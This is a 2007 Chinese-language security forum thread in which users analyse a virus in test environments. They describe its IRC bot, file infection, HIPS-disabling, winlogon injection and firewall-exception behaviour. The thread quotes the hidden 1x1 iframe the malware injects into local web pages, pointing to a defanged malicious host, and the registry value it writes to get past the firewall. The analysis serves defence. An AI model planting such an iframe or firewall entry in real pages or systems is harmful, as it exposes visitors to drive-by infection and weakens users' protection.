强毒(等高人分析)

孤独更可靠

原帖由 kuririn 于 2007-10-9 16:47 发表


用 eq

但只有 5. 6. 發生

阻止 5. 6. 它就消失了

不過 5. 不是只有 winlogon.exe

而是所有進程它都會掃一遍

1、IRCbot

\\普通防火墙拦不住,我也只能抓住IP地址,因为这个协议...

2、感染文件（判断系统文件感染（跳过），系统盘一样遭殃，捆绑，感染标记PADDINGXXPADDING……）

\\允许执行的话,你的EQ会提示,估计一段时间后要换鼠标(当然,EXE文件5W以上的话,要多加一个)

3、Hook（不记得哪几个了），好像是进程启动和读取等几个函数

\\SREng和URK会提示

4、破坏HIPS驱动（EQ、SSM均失效），原理不懂，还是恢复了SSDT挂钩？

\\释放到一半,你就知道了.那时候他们的存在,只能是占内存,不能起其他作用

5、往Winlogon写入代码，并直接获取系统内存。

是的,传递,可能是内存映射

6、添加到系统防火墙的忽略列表（穿墙）。

\\略

7、查找硬盘网页，插入JS代码：

<iframe src="hXXp://ntkrnlpa.info/rc/?i=1" width=1 height=1 style="border:0"></iframe>
</BODY>
</HTML>
\\这个刺猬最拿手了,肯定解出来了,我现在也看看去吧

继续等高人

kuririn

我真的只有 5. 6. 發生啊

況且阻止 5. 6. 應該也不會影響它其他動作的產生吧

或者有可能是因為我有個爛系統 呵呵

孤独更可靠

原帖由 kuririn 于 2007-10-9 17:14 发表
我真的只有 5. 6. 發生啊

況且阻止 5. 6. 應該也不會影響它其他動作的產生吧

或者有可能是因為我有個爛系統 呵呵

第5点是释放步骤呢,病毒要写入内存,阻止就等于玩完了

呵呵

zhbst

这病毒是不是发作时间啊，望着虚拟机半天什么都没发生，没进程，EQ还在工作，只是重启的时候会弹出询问，操作对象为空
Wsyscheck和冰刃检测不到隐藏进程，sreng也没提示那里有不对
难道这些对那病毒都没用

micetai

NIS2008

爱陌能住

怎么能看出我重启后系统中是否还有这个病毒的残余呢???(用影子的.但不知是否能完全恢复??)

唉...好晕啊~~...

我将EQ设为自学习.(主要想看看日志.)
所以对系统文件的保护也就为0了...
开着SSM.运行这个毒.(SSM只是平时使用的规则.)

结果.只提示了一个改注册表的.如下.
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List
注册表值:*\*\*\(路径.略了)nvsvc64.exe
类型:reg_sz
值:*\*\*\*\nvsvc64.exe:*:enabled:@shell32.dll -1
(问一个.这个注册表,修改...目的是什么.是让我打不开所有的东西吗??)


然后.桌面的东西渐渐的就没反应了.(只有SSM的窗口还可以运行,并且可以操作.)

没法~只得按下电脑重启键...

kuririn

重新編輯

[ 本帖最后由 kuririn 于 2007-10-9 19:02 编辑 ]

promised

一看就是老外的东西
老外常用的那层外壳
都没脱掉
晕死
吃完饭来脱壳

[ 本帖最后由 promised 于 2007-10-9 18:50 编辑 ]

爱陌能住

毒应该已经顺利写入内存了吧..

除了SSM .
EQ根本就没有设防...

在EQ的日志中.显示.它已经和我的运行中的,没运行的.(卡巴根本就没有运行.)都有过亲密接触了.(修改内存.)

promised

应该是脱干净了